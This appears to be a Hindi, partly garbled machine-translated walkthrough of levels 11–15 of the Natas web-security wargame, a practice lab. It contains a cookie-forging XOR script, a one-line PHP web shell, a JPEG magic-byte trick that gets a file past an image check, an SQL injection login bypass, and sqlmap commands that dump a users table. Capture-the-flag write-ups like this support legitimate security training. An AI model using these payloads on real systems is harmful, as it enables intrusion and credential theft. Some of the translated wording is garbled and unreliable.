नेटस वेब। वेब भेद्यता का फायदा उठाने के उद्देश्य से CTF मंच का मार्ग। भाग २

इस लेख में, हम एक उदाहरण के रूप में नाट्स वॉरगेम्स का उपयोग करके कुछ WEB- पहचान के संचालन से निपटेंगे। प्रत्येक स्तर पर अगले स्तर के पासवर्ड तक पहुंच है। सभी पासवर्ड / etc / natas_webpass / files में भी संग्रहीत हैं। उदाहरण के लिए, natas5 का पासवर्ड फ़ाइल / etc / natas_webpass / natas5 में संग्रहीत है और केवल natas4 और natas5 उपयोगकर्ताओं के लिए पढ़ा जाता है।

स्तर 11

पार्स कोड:

1. पासवर्ड तब उपलब्ध होगा, जब डेटा शोज़ के साथ मुख्य शोपासवर्ड का मान "हाँ" हो;
   
   
2. डेटा सरणी लोडडैट फ़ंक्शन द्वारा बनाई गई है, जिसमें डिफ़ॉल्ट डेटा को एक पैरामीटर के रूप में पारित किया जाता है;
   
   
   
   
3. लोडडेटा फ़ंक्शन एक कुकी से डेटा मानों को लोड करता है (बेस 64 में डेटा को कूटता है, एक अज्ञात कुंजी पर एक्सोर को एन्क्रिप्ट करता है, जोसन प्रारूप में डेटा को डीकोड करता है);
   
   
   
   
4. प्राप्त मूल्यों को निर्धारित करता है।

आपको क्या करने की आवश्यकता है:

1. पुनर्प्राप्त XOR एन्क्रिप्शन कुंजी:
   • एक कुकी से एन्क्रिप्टेड डेटा ले;
   • डिकोड बेस 64;
   • json प्रारूप में डिफ़ॉल्ट डेटा सांकेतिक शब्दों में बदलना;
   • प्रॉक्सी को समयसीमा प्राप्त हुई।
2. उलटा एल्गोरिथ्म का उपयोग करके नए डेटा को एन्कोड और एन्क्रिप्ट करें, जहां showpassword == हाँ ;
3. कुकी में नया डेटा डालें और पृष्ठ को फिर से लोड करें।

<?php function xor_encrypt($in, $k) { $key = $k; $text = $in; $outText = ''; for($i=0;$i<strlen($text);$i++) { $outText .= $text[$i] ^ $key[$i % strlen($key)]; } return $outText; } $old_data_code = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"; $old_data_decode = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); $new_data_decode = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"); $KEY = xor_encrypt(base64_decode($old_data_code), json_encode($old_data_decode)); echo "key: ". $KEY . "\n"; $KEY="qw8J"; $new_data_code = base64_encode(xor_encrypt(json_encode($new_data_decode), $KEY)); echo "new cookie: " . $new_data_code . "\n"; ?> 

स्तर 12

जब आप फ़ाइल को साइट पर सहेजते हैं, तो यह एक यादृच्छिक नाम और JPEG एक्सटेंशन के तहत सहेजा जाता है। लेकिन सबसे महत्वपूर्ण बात यह है कि यह नाम फ़ाइल के चयन से पहले ही उपयोगकर्ता को छिपे हुए फॉर्म के एक छिपे हुए क्षेत्र में प्रदान किया जाता है, और उसके बाद इसे फ़ाइल के साथ सर्वर पर भेजा जाता है।



कार्य: php-shell बनाएँ, सर्वर से अनुरोध को रोकें और
फ़ाइल का नाम * .php में बदलें।

 <? echo system($_GET["cmd"]); ?> 

हम Burp Suite का उपयोग करते हैं: हमने ब्राउज़र प्रॉक्सी सेटिंग्स को 127.0.0.1:8080 पर सेट किया है। खोल भेज दो। प्रॉक्सी टैब में, हम अनुरोध को प्रतिस्थापित करते हैं।







हम अपनी फाइल को सर्वर पर भेजते हैं, कमांड लाइन को कमांड लाइन से होकर गुजरते हैं।

 cat /etc/natas_webpass/natas13 

इस प्रकार की भेद्यता को अप्रतिबंधित फ़ाइल अपलोड के रूप में वर्गीकृत किया गया है।

शेल बनाने के लिए, php स्थिरांक का उपयोग करना सबसे अच्छा है, क्योंकि सिस्टम फ़ंक्शन का निष्पादन सर्वर सेटिंग्स द्वारा निषिद्ध हो सकता है।

स्तर 13

सर्वर पर समान शेल को सहेजते समय, हमें बताया जाता है कि यह एक छवि नहीं है। हम कोड का विश्लेषण करते हैं।



Exif_imagetype फ़ंक्शन मौजूद है।





JPEG फ़ाइल की जाँच करने के लिए, यह फ़ंक्शन आंतरिक फ़ंक्शन is_jpeg का उपयोग करता है, जो फ़ाइल के पहले चार बाइट्स की जाँच करता है।



तथ्य यह है कि php दुभाषिया कोड को निष्पादित करता है जो <के बीच है? ?>, अन्य सभी वर्णों को लंघन। हेक्स संपादक में पिछले स्तर का खोल खोलें और फ़ाइल की शुरुआत में बाइट्स 0xFFD8FFE0 जोड़ें।



पिछले स्तर के साथ सादृश्य द्वारा साइट पर भेजें और एक पासवर्ड प्राप्त करें।

स्तर 14

प्राधिकरण फॉर्म में एक सामान्य त्रुटि। डेटाबेस क्वेरी:

 SELECT * from users where username="username" and password="password"; 

अनुरोध को हमेशा सच करना संभव है: लॉगिन = "व्यवस्थापक" या 1 = 1 - "।



इस मामले में, या 1 = 1 रिटर्न सही है, और बाकी अनुरोध पर टिप्पणी की गई है:

 SELECT * from users where username="admin" or 1=1; 

हम पासवर्ड निकाल लेते हैं।

इस प्रकार की भेद्यता SQL इंजेक्शन की श्रेणी के अंतर्गत आती है।

स्तर 15

इस रूप में, हम sqlmap के संचालन का विश्लेषण करते हैं। एक अनुरोध भेजें और डेटा और HTTP हेडर को इंटरसेप्ट करें।





हम हेडर से केवल आवश्यक जानकारी का चयन करते हैं। इस मामले में: उपयोगकर्ता-एजेंट, संदर्भकर्ता, प्राधिकरण। Sqlmap पैरामीटर सेट करें:

• -u "URL"
• - हेडर = "HTTP हेडर, '\ n` द्वारा अलग किए गए"
• - डेटा = "पोस्ट अनुरोध डेटा"
• - current-db - निर्धारित करें कि कौन सा डेटाबेस उपयोग किया जाता है
• --tamper = space2comment - स्ट्रिंग / ** / के साथ अंतरिक्ष को बदलें (SQL में, यह वही बात है)
• - स्तर = (1-5) - स्कैन स्तर
• - क्रिस् = (1-3) - स्कैनिंग का जोखिम

Sqlmap ने निर्धारित किया कि उपयोगकर्ता नाम बूलियन-आधारित ब्लाइंड इंजेक्शन के लिए कमजोर है, और सही घटना के लिए सही डेटाबेस प्रतिक्रिया दिखाती है (बाद के स्कैन में, आप तुरंत कमजोर पैरामीटर और इंजेक्शन के प्रकार को निर्दिष्ट कर सकते हैं: -p उपयोगकर्ता नाम और .chnique = B)।

बी: बूलियन-आधारित अंधा SQL इंजेक्शन
यू: यूनिअन क्वेरी एसक्यूएल इंजेक्शन
T: समय-आधारित अंधा SQL इंजेक्शन
E: त्रुटि-आधारित SQL इंजेक्शन
S: स्टैक्ड क्वेरीज़ SQL इंजेक्शन

Sqlmap ने MySQL DBMS (बाद के स्कैन में, पैरामीटर --dbms = MySQL) का पता लगाया और पूछा कि क्या mysql के संस्करण को निर्धारित करना आवश्यक है (डिफ़ॉल्ट हाँ है)।



सकलैम्प ने बताया कि MySQL का संस्करण = = 5.0.12 (यह DBMS उपयोगिता स्थिरांक का चयन करने के लिए आवश्यक है)।



Sqlmap ने उपयोगकर्ता नाम पैरामीटर के लिए भार निर्धारित किया और पूछा कि क्या अन्य मापदंडों की जाँच की जानी चाहिए (डिफ़ॉल्ट रूप से, नहीं)। यह लोड को भी दर्शाता है।



नोड के बारे में जानकारी प्रदान करता है और, जैसा कि हमने अनुरोध किया था, वर्तमान डेटाबेस: natas15।





नए ज्ञात आंकड़ों को देखते हुए, हम natas15 डेटाबेस से तालिकाओं का पता लगाते हैं:

• -D "डेटाबेस"
• - टेबल - परिभाषित टेबल

Sqlmap ने एक उपयोगकर्ता तालिका को परिभाषित किया।



हम उपयोगकर्ताओं की तालिका में कॉलम पहचानते हैं:

• -टी "टेबल"
• - कॉलम - स्तंभों को परिभाषित करते हैं

Sqlmap ने 2 कॉलम को परिभाषित किया।



हम उपयोगकर्ता तालिका (विकल्प - डंप) को डंप करते हैं। डंप में 3 मिनट लगे। हम 8 थ्रेड्स (- 8 थ्रेड्स) में अनुरोध निष्पादित करते हैं - परिणामस्वरूप: 1 मिनट।



हम पासवर्ड निकाल लेते हैं।

जारी रखा जाए। आप टेलीग्राम पर हमसे जुड़ सकते हैं।